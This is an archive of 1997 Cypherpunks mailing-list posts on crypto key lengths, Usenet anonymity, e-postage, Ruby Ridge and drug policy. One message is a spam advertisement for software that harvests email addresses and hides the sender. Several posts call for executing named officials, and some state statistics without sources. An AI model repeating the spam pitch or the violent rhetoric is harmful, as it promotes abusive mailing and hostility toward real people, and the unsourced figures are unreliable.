Statistics, we know that these so-called statistical rates are ripe for
producing the desired results versus providing an accurate statistical
account.

Case in point: Prior to Reagan's Administration, the Armed Forces were
never included in the employed or non-employed categories.  Reagan added
the Armed Forces to the employed category, and the masses were tickled pink
when the government announced that employment rates increased dramatically.

 
>Damn, I'm smart...

Since I don't know you, I am in no position to comment.  You may be smart,
highly  intelligent, or a genius - or you may possess the analytical
processes of a gerbil.  Whichever category you are within, perhaps you
should keep in mind the old saying: "It's a thin line between genius and
insanity."  [A little appetizer for thought...].




**************************************************************************
Lynne L. Harrison, Esq.     |    Lazlo's Chinese Relatively Axiom:
Poughkeepsie, New York      |    "No matter how great your triumphs or
lharrison at mhv.net           |    how tragic your defeats, approximately
http://www.dueprocess.com   |    one billion Chinese couldn't care less."
**************************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.








From stewarts at ix.netcom.com  Fri Aug 22 00:16:52 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 22 Aug 1997 15:16:52 +0800
Subject: Chiropractic
In-Reply-To: <199708191755.MAA03771@mailhub.amaranth.com>
Message-ID: <3.0.2.32.19970821235638.0068bebc@popd.ix.netcom.com>



>>Well the field of Psychology is second only Chiropracticy for quacks.
...
>Actually, you are being too kind here to Chiropractic.

Feh.  While there certainly are chiropractors who are quacks
(especially since it's much easier for a quack to become a
chiropractor than a government-licensed Real Doctor (:-) ),
and while some of the theory of the various schools is quite bogus,
there are chiropractors who are quite skilled at making people's
backs feel better and helping other musculo-skeletal problems,
and most of them do follow a certain amount of scientific method in
that they tend to keep the hypotheses that work and reject those that
don't (the hypothesis being either "this technique will help the patient 
feel better" or "the rubes will keep coming back for this", 
depending on the particular practitioner.)

>But beware the siren song of weeding out quacks. 
Hear, hear!

>My local community floated a proposal to license and regulate psychics, 
>palm readers, fortune tellers, etc., until wiser heads prevailed,
>pointing out the essential idiocy of this.  Not to mention the First 

Back in Red Bank, New Jersey, there was a long-standing ban on
fortune-tellers, tarot-card readers, etc.; people had pretty much
forgotten about it until a few years back when somebody opened a
NewAgey book&crystal complete with tarot reading and and the like,
and somebody tried to get it closed down.  The original laws were
intended to stop frauds preying on the gullible; they weren't
really designed to keep the True Believers from selling to each other...
I think the law got overturned.

And By The Way, Tim, your aura indicates a high level of cynicism,
which interferes with the psychic abilities of people around you.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Fri Aug 22 00:20:03 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 22 Aug 1997 15:20:03 +0800
Subject: death of Usenet
In-Reply-To: <199708181504.LAA17855@pinotnoir.media.mit.edu>
Message-ID: <3.0.2.32.19970821232543.02f62530@popd.ix.netcom.com>



>> If I understand the implemented Eternity service correctly, it
>> fundamentally relies on Usenet as the propagation method. What happens
>> if Usenet dies? How will I continue to refresh my Eternity document?

Was it Yogi Berra who said "Nobody goes there any more; it's too crowded."?
While Usenet is becoming a vaster wasteland by the month,
for the purposes of an Eternity service, or alt.anonymous.messages,
that's fine, because there's more noise to hide your signal in,
and it doesn't really matter if it's 98% spam as long as your
potential user base can get the service without attracting much attention.

The more interesting problem with Usenet is that it no longer
operates in the old flood-routing fashion, where everybody had
all the news they could handle on their machines and could
quietly grub the articles they wanted out of /usr/spool/news,
and a 300...1200...9600 baud modem could receive it all.
Instead, news tends to be exchanged between servers that can
handle the flood of 1+ GB/day, and news clients download the 
articles they want from the servers, which makes it much easier to
monitor who's actually reading what, though you could still get
a feed of alt.anonymous.messages or alt.binaries.pictures.stego
without the Traffic Analysts knowing which messages were for you.

Some counters to this may be to use services like DejaNews to read
the news through web anonymizers (if you trust them), or to
build news retrieval features into remailers (if you trust them,
and preferably with a pay-per-retrieval system so the remailer
doesn't just get resource-abused or entrapped as a porn retriever)
or to use SSH to log in to your shell accounts on your cash-paid ISP.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Fri Aug 22 00:21:49 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 22 Aug 1997 15:21:49 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <19970817123643.13713.qmail@hotmail.com>
Message-ID: <3.0.2.32.19970821225601.0077e370@popd.ix.netcom.com>



-----BEGIN PGP SIGNED MESSAGE-----

>>4096 bit keys are going to be rather hard to break in this lifetime. :-) 
>but to generate and signing a message with 4096 bits key , will take 
>much times, than with 2048 or 1024

Diffie-Hellman keys have different standards for how long they
need to be, since they're based on discrete logs rather than factoring,
but the necessary lengths are similar.  However, generating
Diffie-Hellman keys is much faster, once you've settled on a modulus,
since you don't need to search for probable primes, you just
need to pick a random number that's relatively prime to the 
modulus-1 (trivial, if you're using a Sophie-Germain prime modulus)
and maybe to the generator (also trivial.)  So go for 4096,
or a least use a much longer key than the 192 bits Sun once used :-).

There's no particular reason _not_ to support 4096-bit RSA keys 
(since using dynamic-sized data structures makes programs more reliable 
and less susceptible to attacks like overly-long input data), 
but there's also really no need for keys longer than 2048 bits unless
some radical algorithmic breakthrough happens.  (Computer hardware 
breakthroughs aren't relevant; the exponential behaviour of the
algorithms mean that a few extra bits makes any device that fits
on the planet still too small.)  1024 bits is probably enough,
but maybe not, depending on how long you need to keep something secret
and how much technology improves doing your lifetime.  

Techniques for breaking into your computer and stealing the private key
will probably improve far faster than cracking algorithms,
especially as 
1) Nanotech makes it much easier to recover old data off disks and
send nanobots to collect and return it
2) The Singularity makes people smart enough to find all the security
bugs in Win2001
3) The Fingertip Escrow Act requires recording of all keystrokes and
other potentially illicit finger activities
4) Telepathy-input Yellow Sticky Notes make recording your passphrase
so much more convenient.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQBVAwUBM/0p8PthU5e7emAFAQEkzAH/QFXqB3diLTQHi12aXqFKhsoDtZJ2JhAk
hyOHb9nMmOL/QnyrZ7s3SYega4Pb/cwF+e4w9/lh5+9QzYZawKq/BQ==
=jAHi
-----END PGP SIGNATURE-----


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From Michael.Johnson at mejl.com  Fri Aug 22 00:22:32 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Fri, 22 Aug 1997 15:22:32 +0800
Subject: Spam-killing PGP5/ecash postage plugin Was Re: Remailer   chaining  plugin for Eudora
In-Reply-To: 
Message-ID: <3.0.3.32.19970822090126.009e1390@localhost>



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Robert Hettinga wrote:
>> and it would be the death of mailing lists.
>Not at all. At the very least, mail from lists I'm subcribed to could
come
>postage due.

But then you'll get spam on the list. Most of the spam I get is from
mailing lists.

If it's $.02 to send a mail to 10000 cypherpunks, then spammers won't
hesitate to send it. If it's $.02 * 10000 ($200) then only rich people
(like tcmay) will post here. The only solution I see is moderation and
censorship, and that can be (and has been) done without e-postage.

Exactly how do you think that e-postage would decrease spam on mailing
lists?

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBM/1HLMUc8bdD9cnfEQK+mACfaKBL1UHz54rTIVG1OLf3ASQ330IAn3QR
Ped/qRtSae20p/vDrMCzCCQj
=Bp6T
-----END PGP SIGNATURE-----


Mike.






From amp at pobox.com  Fri Aug 22 00:36:38 1997
From: amp at pobox.com (amp at pobox.com)
Date: Fri, 22 Aug 1997 15:36:38 +0800
Subject: take The Boulder Pledge now!!!
In-Reply-To: <199708220507.WAA10828@toad.com>
Message-ID: 



=snip=
> The Boulder Pledge works by making junk mail unprofitable.  If nobody 
> *ever buys anything,* spammers eventually will quit.  I hope.

> End the Plague.  Raise your right hand.  Read aloud [the Boulder 
> Pledge].  Then, pass it on, via Email to 10 or 20 of your concerned
> friends.  Thanks.

hahahaha ROTF! Stop spam, please forward this to 2000 of your closest friends!





--
http://131.107.1.68/bbs/msnbc-commerce/710.htm


---------------End of Original Message-----------------

------------------------
Name: amp
E-mail: amp at pobox.com
Date: 08/22/97
Time: 02:02:46
Visit me at http://www.pobox.com/~amp

Have you seen 
http://www.public-action.com/SkyWriter/WacoMuseum
------------------------
"The Legislature interprets the Constitution as damage, and routes around it."

For the benefit of Spambots everywhere:
webmaster at localhost
abuse at localhost
postmaster at localhost






From nobody at REPLAY.COM  Fri Aug 22 00:36:38 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 15:36:38 +0800
Subject: State Charges in Weaver Case
Message-ID: <199708220720.JAA02684@basement.replay.com>



A species of Monger named GovtLicensedMurderMonger wrote:

> Ray Arachelian wrote: (re: "Just Following Orders" Horiuchi)
> > Fine, then what shall we charge the one that gave the order with?  And
> > what shal be the punishment?  If the one who takes the order relinquishes
> > reposability, then the one giving the order must be doubly responsible.
 
>   Jeez, Ray. If you follow this twisted train of logic, you end up
> expecting the President and the Legislature to take responsibility for
> the State of the Union.
>   Are you some kind of godless Commie, or something? You'll certainly
> feel foolish when the FBI lab proves that the trigger was pulled by
> a drug dealer who was told to do so by a child molester. It's just a
> shame that those poor federal agents had to be there to witness the
> tragedy.

  The godless Libertarians are also spouting off the same type of 
ludicrous claims regarding government officials being responsible
for their actions.
  Like the people we vote for actually had any say in how this
country is run... Geez, wise up, guys.

GeezMonger
~~~~~~~~~~~~~~~
THE LIBERTARIAN, By Vin Suprynowicz
    'Enough money to have fed every human on earth'

    "August 2, 1997, marks the 60-year anniversary of the failed and
devastating American public policy of drug prohibition," announced
California Libertarian  gubernatorial candidate Steve Kubby of Lake
Tahoe
in a recent -- and refreshingly outspoken -- press release.

  "Just how big is $400 billion?" Kubby asks. "Adjusted for 1997
dollars,
$400 billion is enough money to have fed every human on Earth, each
year,
for the past 10 years."

  "As one of the chief architects of the War on Drugs, Lungren has a lot
of
explaining to do," Kubby said. "What has been accomplished by spending
such
such an incredible sum of money? We've created the biggest prison system
in
the history of the world, with more of our own citizens rotting behind
bars
than any other nation in the world -- and drugs are cheaper and more
easily
available than ever before, especially to kids.

  "It's time to hold public officials like Dan Lungren accountable for
the
tragic waste of money and lives that has produced nothing but more
drugs,
more violence, more addiction, and more misery."

"It is even more puzzling as to why Mr. Lungren thinks his colossal
failures in the War on Drugs qualify him for higher public office."

  The "Kubby for governor" web page is at
http://www.alpworld.com/kubby98.

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com. The
web
site for the Suprynowicz column is at http://www.nguworld.com/vindex/.
The
column is syndicated in the United States and Canada via Mountain Media
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.







From whgiii at amaranth.com  Fri Aug 22 01:09:26 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Fri, 22 Aug 1997 16:09:26 +0800
Subject: State Charges in Weaver Case
In-Reply-To: <19970822005931.27111.qmail@zipcon.net>
Message-ID: <199708220723.CAA17958@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <19970822005931.27111.qmail at zipcon.net>, on 08/21/97 
   at 05:59 PM, Mike Duvos  said:


>Here's an odd Ruby Ridge development, which just floated across Reuters.

>Idaho prosecutors have filed two sets of state charges against persons
>involved in the incident.

>Kevin Harris was charged with First Degree Murder for "killing Deputy
>U.S. Marshall William Degan willfully and with malice aforethought."

>FBI Sniper Lon Horiuchi was charged with involuntary manslaughter in the
>death of Vicki Weaver.

>Shouldn't it be First Degree Murder for deliberately killing someones
>wife with a baby in her arms, and involuntary
>manslaughter for using possibly excessive force against an armed
>attacker?

>Seems a bit backwards to me.

>I suppose it has something to do with that "only following
>orders" thing. :)

He should be up on 1st Degree Murder charges as these were a planned,
permeditated murders. Freeh, Reno, and Clinton should all be up on the
same caharges as co-consiritors for planning and ordering the murders and
for covering up the matter after the fact.

Of cource all 3 should be introduced to "'ol Sparky" for their part in the
murders at Waco.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/0w349Co1n+aLhhAQHhgAP/YoyZAMWVGGXUKpJLZPENf0dVYYxTQBWb
GbZ6pOdI1Jdh4lA95IoZ4mA1iPIKLZ4cq0FjEDtThy6cXdJUXRWgRFpV54NrwqsO
+VbIZQRhcgoUsYXsUIO5lHzAfsarp4RsVHNEmf3D+IWKAt24xyfTgAnSL+pq58EL
Kb+Te+I60rc=
=6/NF
-----END PGP SIGNATURE-----






From gbs at dev.null  Fri Aug 22 01:41:22 1997
From: gbs at dev.null (Graham John-Bullshit)
Date: Fri, 22 Aug 1997 16:41:22 +0800
Subject: take The Boulder Pledge now!!!
In-Reply-To: <199708220507.WAA10828@toad.com>
Message-ID: <33FCD4D4.3126@dev.null>



I think amp needs to have our 2000 friends each send 20,000 copies
of this post back to him.

amp at pobox.com wrote:

> hahahaha ROTF! Stop spam, please forward this to 2000 of your closest friends

Graham John-Bullshit
moderator: alt.2599.99







From anon at anon.efga.org  Fri Aug 22 01:45:02 1997
From: anon at anon.efga.org (Anonymous)
Date: Fri, 22 Aug 1997 16:45:02 +0800
Subject: Incoming! / Re: Chiropractic
Message-ID: 



Bill Stewart wrote:
 
> And By The Way, Tim, your aura indicates a high level of cynicism,
> which interferes with the psychic abilities of people around you.

  That's not his aura, that's tracer bullets, Bill.

  Bill...?
  Bill.......???








From nobody at REPLAY.COM  Fri Aug 22 01:46:45 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 16:46:45 +0800
Subject: Bad CypherPunk! No privacy! / Re: PGP5i supports RSA keys?
Message-ID: <199708220824.KAA08238@basement.replay.com>



Bill Stewart wrote:

> but there's also really no need for keys longer than 2048 bits unless
> some radical algorithmic breakthrough 
> 1024 bits is probably enough

  Other than the above, a very informative post.

  Perhaps all encryption programs ought to be named Enigma-1,
Enigma-2, etc.
  When the Allies gained the capability to break the Enigma code,
there was no front-page announcement. I checked the news headlines
today, and there was no front-page announcement of a "radical
algorithmic breakthrough." I take this to be proof positive that
the ever-present "they" have indeed made a breakthrough, and that
I need to use the strongest tools currently available for secure 
communications.

  Like the ZipLock ads where they put the angry bees in the ZipLock
and in the Generic Brand plastic bags, I am always tempted by the
statement that "512/1024/etc." is "good enough," to ask the person
making the statement to write a letter threatening the life of
"You Know Who," encrypt it and send it to me for forwarding to
the Whitewaterhouse. ("And don't forget to use the '-c' option.")

  Would you rather have the angry F-Bee-I agents in the 4096 bit
encrypted CryptLock bag or the 1024 bit GenericLock bag?

:: B o o t s






From stewarts at ix.netcom.com  Fri Aug 22 01:56:24 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 22 Aug 1997 16:56:24 +0800
Subject: Welfare Solution #389 / Re: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <199708220530.HAA22270@basement.replay.com>
Message-ID: <3.0.2.32.19970822011845.02fb7814@popd.ix.netcom.com>



>William H. Geiger III wrote:
>> A prime example is the welfair class in America. All their basic needs are
>> provided for by the State (food, housing, medical, education, ...) 
[If you're going to rant about government-provided education,
_please_ spell most of your words correctly, or let technology help you...]

>>and yet they have the highest crime rates.
No, they have high rates of arrest and conviction for law violations,
primarily drug laws.  Yes, there's also crime, but that's a separate problem.

>Welfare Solution #389:
>  How about this? - When a person on welfare is busted for heroin use,
>or theft to support a habit, the State thereafter sends the person's

Last time I ran the numbers, the estimated free-market cost of 
medical-quality heroin is less than $1/day, and cocaine about $3/day;
the coke figures are from Bush's 1989 drug-control policy.
All the crime and violence involved in the black-market trade is because
somebody's convinced society that there's a serious moral difference
between a junkie and a drunkard, and that Government Needs A War To Fix It.
I work in San Francisco, where there are junkies and drunkards begging
on the street corners (except when the cops run them off for annoying the
politer classes), and I've noticed that most of them can afford tobacco;
the real cost of politically less correct drugs is about the same.

So if you want the State sending the junkie's welfare check to the
theft victims, you should also ask them to send the drug cops's paycheck
as well.  Because they're partners in crime.

======
But this isn't a cypherpunks issue any more, unless we note that,
if the government would stop creating black markets like this,
there'd be a lot less need for Anguillan remailers, Swiss bank accounts,
money-laundering conferences, and many of the other techniques we use
to help the oppressed and downtrodden keep making the big bucks....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From whgiii at amaranth.com  Fri Aug 22 02:24:46 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Fri, 22 Aug 1997 17:24:46 +0800
Subject: Welfare Solution #389 / Re: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <3.0.2.32.19970822011845.02fb7814@popd.ix.netcom.com>
Message-ID: <199708220913.EAA18778@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.2.32.19970822011845.02fb7814 at popd.ix.netcom.com>, on 08/22/97 
   at 01:18 AM, Bill Stewart  said:

>>William H. Geiger III wrote:
>>> A prime example is the welfair class in America. All their basic needs are
>>> provided for by the State (food, housing, medical, education, ...)
 
>[If you're going to rant about government-provided education, _please_
>spell most of your words correctly, or let technology help you...]

This was neither a rant about government provide education nor is one typo
in a posting relevant to the topic.

>>>and yet they have the highest crime rates.

>No, they have high rates of arrest and conviction for law violations,
>primarily drug laws.  Yes, there's also crime, but that's a separate
>problem.                                ^^^^^

Which was the issue I was addressing. I made no mention of drugs in my
post. Perhaps in the future you could make the effort to quote properly so
the statements of others are not mistaken for mine.

The rest below is irrelevant as it was not the topic I was addressing.

>>Welfare Solution #389:
>>  How about this? - When a person on welfare is busted for heroin use,
>>or theft to support a habit, the State thereafter sends the person's

>Last time I ran the numbers, the estimated free-market cost of 
>medical-quality heroin is less than $1/day, and cocaine about $3/day; the
>coke figures are from Bush's 1989 drug-control policy.
>All the crime and violence involved in the black-market trade is because
>somebody's convinced society that there's a serious moral difference
>between a junkie and a drunkard, and that Government Needs A War To Fix
>It. I work in San Francisco, where there are junkies and drunkards
>begging on the street corners (except when the cops run them off for
>annoying the politer classes), and I've noticed that most of them can
>afford tobacco; the real cost of politically less correct drugs is about
>the same.

>So if you want the State sending the junkie's welfare check to the theft
>victims, you should also ask them to send the drug cops's paycheck as
>well.  Because they're partners in crime.

>======
>But this isn't a cypherpunks issue any more, unless we note that, if the
>government would stop creating black markets like this, there'd be a lot
>less need for Anguillan remailers, Swiss bank accounts, money-laundering
>conferences, and many of the other techniques we use to help the
>oppressed and downtrodden keep making the big bucks....

>#			Thanks;  Bill
># Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
># You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp #   (If
>this is a mailing list or news, please Cc: me on replies.  Thanks.)


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/1Kto9Co1n+aLhhAQG0/wP/ZWPPFnOh1gpipxFY6dqtIU6pVDyvp1x/
36rCPbG0yuNfj1E1yHHoGKkAYpGANVZOH0NfkMh+2DG6FZKF54sR5pf+OL/UUOZM
wMCbp49uRYD0qoHNcMrXV+AddRAA58mW0sYyxj6RHQuZO61IljvT8DfGPZAGU4mv
b0s7H+DqAPs=
=Zn2H
-----END PGP SIGNATURE-----






From anon at anon.efga.org  Fri Aug 22 02:59:55 1997
From: anon at anon.efga.org (Anonymous)
Date: Fri, 22 Aug 1997 17:59:55 +0800
Subject: State Charges in Weaver Case
Message-ID: 



William H. Geiger III wrote:

> He should be up on 1st Degree Murder charges as these were a planned,
> permeditated murders. Freeh, Reno, and Clinton should all be up on the
> same caharges as co-consiritors for planning and ordering the murders and
> for covering up the matter after the fact.

  After their conviction in State court, we should execute their spouse 
and child, and then try them again in Federal court.

> Of cource all 3 should be introduced to "'ol Sparky" for their part in the
> murders at Waco.

  A person who never leaves their State can be arrested and charged
for a resident of a different State, with different laws, accessing
the material on h/is/er hard drive.

  Can a State without the death penalty arrest and charge an 
executioner in a different State, that does have the death 
penalty, for murdering one of their State's residents?

  Next time I'm on a topless beach in France, can I make a
citizen's arrest on some beautiful babe and have her extradited
to the U.S. to have her charged? (I would probably settle out
of court for some privately arranged Victim Compensation.)

  If someone murders two people, shouldn't they be electrocuted,
resucitated, and then electrocuted again?

  If Willy Clinton left D.C. at 4 p.m. on a train travelling West
at 50/mph, and Louey Freeh left D.C. 2 hours later on a plane
travelling NorthWest at 20/mph, then why would Willy be on a
train, how would Louey's plane get off the ground, and how could
the "single CypherPunk theory" account for...?
  ...uuuhhh. I think I've already said too much.

Uuuhhh...Monger







From rah at shipwright.com  Fri Aug 22 07:07:35 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 22 Aug 1997 22:07:35 +0800
Subject: IPsec product progress
Message-ID: 




--- begin forwarded text


Reply-To: rgm3 at chrysler.com
X-Sender: rgm3 at pop3hub.is.chrysler.com
Date: Fri, 22 Aug 1997 07:11:56 -0400
To: ipsec at tis.com
From: Robert Moskowitz 
Subject: IPsec product progress
Mime-Version: 1.0
Sender: owner-ipsec at ex.tis.com
Precedence: bulk

If anyone will be in Detroit next week tues-thurs and can make it to
AutoTech, we will be having a live demonstration of IPsec products
interoperating.

Things are touch and go.  We have had routing and hardware problems that
have significantly delayed us.  We do have 5 vendors here and on monday I
will know exactly what to whom we will be demonstrating real automotive
applications secured with IPsec.

All of the products are configured for the current ESP DES-CBC explicit and
AH HMAC-MD5.  Oakley is handling session establishment.  We did not get the
hardware for the CA in time to set up certificates, so we are using
pre-shared keys.


Robert Moskowitz
Chrysler Corporation
(810) 758-8212

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From 5436_sales at emailblaster.com  Fri Aug 22 22:38:53 1997
From: 5436_sales at emailblaster.com (5436_sales at emailblaster.com)
Date: Fri, 22 Aug 1997 22:38:53 -0700 (PDT)
Subject: Complete Bulk Email Pkg. ONLY $49.95
Message-ID: <199708230147.BAA11236@onlinebiz.net>


                  
                     *********************SUMMER PROMOTION******************

Complete Bulk Email Package inluding 25 Million Email Addresses only $49.95

Email Blaster ranks up with all the other bulk email software such as Floodgate,
Email Magnet, Netcontact, Extractor Pro. etc at hundreds of dollars less!!!

Why pay $399 just for a bulk email software, when you can pay
$49.95 including email addresses???

HOW DOES E-MAIL BLASTER WORK?  E-Mail Blaster has dozens of special filters 
to automatically harvest E-mail addresses from major online services such as: 
America OnLine, Compuserve,Delphi, Genie, and of course the internet and will
email your marketing letter to 13k consumers per hour at the single push of a 
button!!!  

SPECIAL CLOAKING DEVICE: Email Blaster can successfully hide your email address.
This will help stop users from flaming your email box! 


SIMPLE TO USE:  E-Mail Blaster does all the work for you and, unlike other
E-mail programs, with E-Mail Blaster there is no need to purchase any 
additional software.

NO SPECIAL EQUIPMENT NEEDED: E-Mail Blastert runs on a PC with Windows
3.xx Windows 95, Windows NT, a 386 or faster processor, 4 MB RAM, and a 
hard drive with at least 10 MB free and your own SLIP or PPP connetion.  No
other software needed.  Also runs on a Macintosh with SoftWindows installed

    
                       Plus....
You can become a distributor of Email Blaster for only $99 and you receive
5 Complete Email Blaster packages. 

Let's say you resell Email Blaster package at a discount of $199 each.
$199 x 5 packages = $995 CASH!!! Your potential is unlimited!

Price List
5 Packages: $99     10 Packages: $149       20 Packages      $299.
Larger quantity discounts are available upon request.

What are you waiting for start making money today SIGN UP NOW!!!
**********************************************************************************************************
 Don't miss out on this Summer Promotion!!! ORDER NOW!!!
Telephone: 609-933-3527  Fax: 609-933-1499



Name: _____________________________________________________


Address:____________________________________________________


City:___________________________________________


State:___________________________


Zip:_____________________________


Telephone::_____________________________________________


E-Mail Address:__________________________________________


Once we receive your order, you will receive a confirmation email, this
will  inform you of our website for you to go download your package immediately!
----------------------------------------------------------------------------------------------------------------------------------
"COMPLETE EMAIL BLASTER PACKAGE" only $49.95 ________

1 Copy of Email Blaster 

1 Electronic Help System: Email Blaster Help System will provide you with step
by step directions on how to use Email Blaster and help with setting up your provider.
For your convience this is built right into your copy of Email Blaster.

Unlimited Email Addresses: 25 Million And Growing
 You can download these addresses right from our website at your convenience.


-----------------------------------------------------------------------------------------------------------------------------------------
5 DISTRIBUTOR PACKAGE only $99: _________
This is a Special Promotion to new distributors only!!!


5 Copies of Email Blaster 

5  Built in Electronic Help Systems:

5 Unlimited Email Addresses: 25 Million And Growing
Our Email Addresses are updated monthly.  You can download these addresses
right from our website at your convenience.

Now you can take advantage of Email Blaster Package and resell each 
package up to $299. each.  You make $1495


10  DISTRIBUTOR PACK  only $149. _______
Includes 10 Complete Packages of Email Blaster.
You can make up to  $2990.00

20 DISTRIBUTOR  PACK: ONLY $299 ________
Includes 20 Complete Packages of Email Blaster.
You can make up to  $5980.00

*************************************************************************************************
If you would like to pay by check, please make check payable to: Internet Marketing
mail to: PO Box 276 Bellmawr, NJ 08099 or  Fax to 1-609-933-1499 along with this order form.
If you are paying with a Fax Check please include an additional $3.00 for check processing fees.

Credit Card: _______________________________________________
Visa, Master Card and AMEX.

EXP. Date: _____________________


Total to be charged: $________________________



Signature:___________________________________________________________





























From alexlh at yourchoice.nl  Fri Aug 22 08:26:27 1997
From: alexlh at yourchoice.nl (Alex Le Heux)
Date: Fri, 22 Aug 1997 23:26:27 +0800
Subject: Welfare Solution #389
In-Reply-To: <3.0.3.32.19970822025549.006f3d6c@pop.mhv.net>
Message-ID: 



Lynne L. Harrison writes:
> At 07:30 AM 8/22/97 +0200, Anonymous wrote:
> >
> >Welfare Solution #389:
> >  Many in the welfair class have their basic needs met by the government
> >and then steal to buy heroin.
> >  How about this? - When a person on welfare is busted for heroin use,
> >or theft to support a habit, the State thereafter sends the person's
> >welfare check to a Crime Restitution fund and lets the person keep
> >stealing, only now it is for the purpose of supplying their own
> >basic needs.
> 
> In NY, when a defendant gets convicted of a crime including a drug offense,
> s/he has to pay a mandatory surcharge part of which is a Crime Victims'
> Fee.  [Query: who is the victim in a drug case? -- but I digress...].
> Also, if it was a crime where the victim suffered financial losses, the
> defendant not only has to pay the Crime Victim's Fee but also restitution
> to the victim.
> 
> Additionally, pursuant to Federal Law, anyone convicted of a drug charge
> and, who is residing is federally-subsidized housing, becomes subject to
> eviction proceedings.  [Quirk: if one family member is engaged in such
> business activities, the entire family is captured under the law's umbrella
> but, again, I digress..].
> 
Kicking a drug addict out of his home, or taking away his one source of
income is not going to solve anything. It'll only make things worse. Worse
for the addict and for society. This will only serve to remove the addict
even further from society and thereby make him more of a burden for that
same society.

Here in The Netherlands we treat drug addiction more as a disease than as
a crime. We try to intergrate him/her back into the normal world of having
a house, paying rent, getting a job, etc.

I Switserland they've gone even further now, and started supplying hardcore
herion addicts with free heroin. The results were quite dramatic. Most of the
addicts gave up stealing/etc and some even managed to get and hold a normal
job. As it turned out, supplying them with free heroin was much cheaper than
having them hang around and steal/rob/etc. It also served to reduce the call
for extra police, and the call by the police for more rights/weapons/etc.

Criminalizing drug offences is a Bad Thing. Unfortunately our own government
is slowely succumbing under the international pressure, and soon we'll have
our own War On Drugs here. This will serve no one, not the addict, not the
casual user and not the general public. Probably it'll only serve the various
law enforcement agencies.

Alex

/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!






From jya at pipeline.com  Fri Aug 22 08:32:32 1997
From: jya at pipeline.com (John Young)
Date: Fri, 22 Aug 1997 23:32:32 +0800
Subject: $1 Million Code Crack
Message-ID: <1.5.4.32.19970822143251.0072f110@pop.pipeline.com>



   $treet Journal, August 22, 1997, p. A7A.

   Hackers' Paradise: Get Wealthy Legally By Cracking a Code

   Crypto-Logic Offers to Pay $1 Million to the Breaker Of
   Encryption for E-Mail 

   By Rodney Ho

   A start-up company would like you to hack your way to $1
   million.

   Crypto-Logic Corp. of Austin, Texas, claims to have created
   an encryption system for electronic mail so foolproof that
   it can't be broken. If someone can figure out a special
   encrypted e-mail message within a year, the company says it
   will pay a reward of $1 million.

   But wait. The technology Crypto-Logic is using for the
   contest hasn't exactly been foolproof. The three computers
   needed to create the contest's Web site unexpectedly
   scrambled data in the site last week, said David Neeley,
   vice president and chief operating officer.

   The breakdown forced him to backtrack from last week's
   announcement that the contest would begin last Friday.
   Instead, he spent several days attempting to fix the
   computers, but to no avail. On Monday, he had to get
   replacement computers. "I've got thousands of dollars worth
